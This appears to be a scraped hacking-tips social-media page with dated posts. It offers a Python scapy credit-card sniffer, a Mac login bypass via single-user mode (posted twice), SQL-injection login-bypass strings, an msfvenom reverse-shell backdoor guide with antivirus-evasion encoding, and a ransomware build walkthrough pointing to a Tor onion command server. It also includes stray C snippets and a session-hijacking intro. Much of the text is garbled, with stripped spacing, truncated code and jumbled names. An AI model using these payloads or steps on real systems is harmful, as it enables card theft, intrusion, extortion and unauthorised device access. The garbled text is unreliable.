11/02/2022
Using python regular expression to sniff credit card
importre
importoptparse
fromscapy.allimport*
deffindCreditCard(pkt):
raw=pkt.sprintf('%Raw.load%')
americaRE=re.findall('3[47][0-9]{13}',raw)
masterRE=re.findall('5[1-5][0-9]{14}',raw)
visaRE=re.findall('4[0-9]{12}(?:[0-9]{3})?',raw)
ifamericaRE:
print'[+]FoundAmericanExpressCard:'+americaRE[0]
ifmasterRE:
print'[+]FoundMasterCardCard:'+masterRE[0]
ifvisaRE:
print'[+]FoundVisaCard:'+visaRE[0]
defmain():
parser=optparse.OptionParser('usage%prog-i')
parser.add_option('-i',dest='interface',type='string',\
help='specifyinterfacetolistenon')
(options,args)=parser.parse_args()
ifoptions.interface==None:
printparser.usage
exit(0)
else:
conf.iface=options.interface
try:
print'[*]StartingCreditCardSniffer.'
sniff(filter='tcp',prn=findCreditCard,store=0)
exceptKeyboardInterrupt:
exit(0)
if__name__=='__main__':
main()
08/02/2022
int main () {
int a[5] = {22, 24, 34, 45, 35};
int *ptr = a;
ptr = a;
printf("%d\n", *ptr, ptr);
ptr++;
printf("%d\n", *ptr, ptr);
ptr++;
printf("%d\n", *ptr, ptr);
ptr-=2;
printf("%d\n", *ptr, ptr);
ptr--;
return 0;
}
04/02/2022
void main()
{
char username[20];
char userpwd[8]; // for storing password
int i;
printf("Enter your username : ");
//gets(username);
scanf("%s",username);
printf("Enter your password : ");
/* accept password */
for(i=0;i
Hackry0DeBian
Send a message to learn more
03/02/2022
🔰 How to access a locked Mac🔰
1) Shut down the computer
2) Start the computer and hold command + s
3) type the following code line by line
🌀 CODE :-
mount -uw /
rm /var/db/.applesetupdone
shutdown -h now
4) Restart the computer
5) Create a new admin account using the setup process that comes in front of you.
6) Wait for the setup to start
7) If you want, you can now change the password of all of the other accounts on the computer.
🟢 Share and Support
De BDe BiannDe Bian
03/02/2022
🔰 How to access a locked Mac🔰
1) Shut down the computer
2) Start the computer and hold command + s
3) type the following code line by line
🌀 CODE :-
mount -uw /
rm /var/db/.applesetupdone
shutdown -h now
4) Restart the computer
5) Create a new admin account using the setup process that comes in front of you.
6) Wait for the setup to start
7) If you want, you can now change the password of all of the other accounts on the computer.
🟢 Share and Support SannSanni Abdul BasituSanni Abdul BasitiSanni Abdul BasitBDe BiannDe BianBDe BiannDe Bian
29/01/2022
Bypassi Authentication of website vulnerable to SQL injection
Here are the code 🤫👇👇👇
' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))
Kebbi State Consolidated E-Tax Portal
22/01/2022
A backdoor is used to bypass security mechanisms, often secretly and mostly undetectably. Using MSFvenom, the combination of msfpayload and msfencode, it's possible to create a backdoor that connects back to the attacker by using reverse shell TCP. In order to develop a backdoor, you need to change the signature of your malware to evade any antivirus software. Complete this project on a pair of computers that you have permission to access, and in the process, you'll learn more about computer security and how this kind of backdoor works.
step 1
Start up Kali and fire up the Terminal console
Type ifconfig to display the interface and check your IP address.
step 2
Type ifconfig to display the interface and check your IP address.
setp3:
Type msfvenom -l encoders to show the list of encoders.
You will use x86/shikata_ga_nai as the encoder.
step 4
Type "msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe > helloWorld.exe
-a x86 --platform windows designates architecture to use.
-p windows/shell/reverse_tcp designates the payloads to embed.
LHOST designates the listener IP address.
LPORT designates the listener port.
-b "\x00" designates to avoid bad character (null bytes).
-e x86/shikata_ga_nai designates the encoders name.
-f exe > helloWorld.exe designates format output.
Step 5:
Type msfconsole to activate the Metasploit.
Now you have generated your backdoor. When the victim clicks on helloWorld.exe, the shell payload that is embedded will be activated and make a connection back to your system. In order to receive the connection, you have to open the multi-handler in Metasploit and set the payloads.
Step 6:
Type use exploit/multi/handler.
step 7:
Type set payload windows/shell/reverse_tcp.
Step8:
Type show options to check the module.
step9:
Type set LHOST 192.168.48.129.
"LHOST" designates the listener IP address.
step 10:
Type set LPORT 4444.
"LPORT" designates t
20/01/2022
LFITester:-- A Python3 program that automates the detection of Local File Inclusion (LFI) attacks in a server.
It runs in Linux/Unix systems but it can run on windows as well.
Disclaimer:- This project was created for educational purposes and should not be used in environments without legal authorization.
:-
https://github.com/kostas-pa/LFITester
Visit Us:- https://ncybersecurity.com
16/01/2022
Creating a ransomeware in Kali
Download and Install the Binaries
The first step is to fire up your Kali and make certain that golang is installed. If not, download it from the Kali repositories by entering;
kali > sudo apt install golang
Next, you will need to login to the root user.
kali > sudo su -

Now create a directory for the binaries. In this case, I named it simply "git".
kali >mkdir git
Next, change directory (cd) to this directory.
kali > cd git
Next, download the binaries from github.com.
kali > git clone https://github.com/mauri870/ransomware

Step #2: Export GO Environment variables
Next, we need to set some environment variables to direct the binaries and GO to the appropriate directories.

Step #3: Make the source code dependencies
Now, with the variables set and exported, we need to make the dependencies. Navigate to the new directory, ransomware, and enter make deps.
kali > cd ransomware
kali > make deps

Step #4: Make the Source Code with options
Now that we have completed the deps make, we can begin to make the source code. In our case, we will use a few options.
First, we want to use ToR to encrypt our communications over the ToR network.
USE_TOR=true
Second, we want to use our dark web server at hackersarisegtdj.onion (you can use any domain or localhost).
SERVER_HOST=hackersarisegtdj.onion
Third, we want to use port 80 (you can use any port).
SERVER_PORT=80
Finally, we want to set the operating system to compile the source code for our operating system, in this case, Linux.
GOOS=linux

Our command should look something like this;
kali > make -e USE_TOR=true SERVER_HOST=hackersarisegtdj.onion SERVER_PORT=80 GOOS=linux
Now hit ENTER and watch your ransomware compile.
Step #5: Check the Directory for ransomware.exe
Once the source code has been generated, do a long listing on the ransomware directory.
kali > ls -l
Now, navigate to the bin directory.
kali > cd bin
Here, you will see the ransomware.exe
GitHub - mauri870/ransomware: A POC Windows crypto-ransomware (Academic). Now Ransom:Win32/MauriCrypt.MK!MTB
A POC Windows crypto-ransomware (Academic). Now Ransom:Win32/MauriCrypt.MK!MTB - GitHub - mauri870/ransomware: A POC Windows crypto-ransomware (Academic). Now Ransom:Win32/MauriCrypt.MK!MTB
15/01/2022
Session hijacking attacks exploit a valid web session to gain access to a computer network or system. Session hijacking is also informally known as cookie hijacking.
Since there are several TCP connections involved in HTTP networking, there is often a method involved in the identification of web users. Whether a particular method is suitable is determined by a session token sent by a web server to the user’s browser following successful authentication. A session ID or session token is a string of varying lengths given to a visitor upon their first visit to a site. There are many ways to incorporate a session ID; it can be worked into the URL or the header of the https request received, or stored as a cookie.
Most browser sessions and web applications are susceptible to session ID attacks, though most can be used to hijack just about any system out there.
Session hijacking attacks, or cookie hijacking attacks, steal or imitate a session token to gain access to a system.
There are several different ways to compromise a session token:
By predicting a weak session token
Through session sniffing
By means of client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc.)
Through man-in-the-middle (MITM) attacks (phishing, etc.)
This article provides a short guide on conducting a pen-testing session to check whether a system is prone to the attacks mentioned above.
Some pre-requisites:
A predetermined soft-target to perform this test on
A local machine with an up-to-date version of Kali Linux installed
A web browser
More specifically, we will be using the Ettercap, Hamster, and Ferret built-in utilities known for their use in conducting MITM attacks.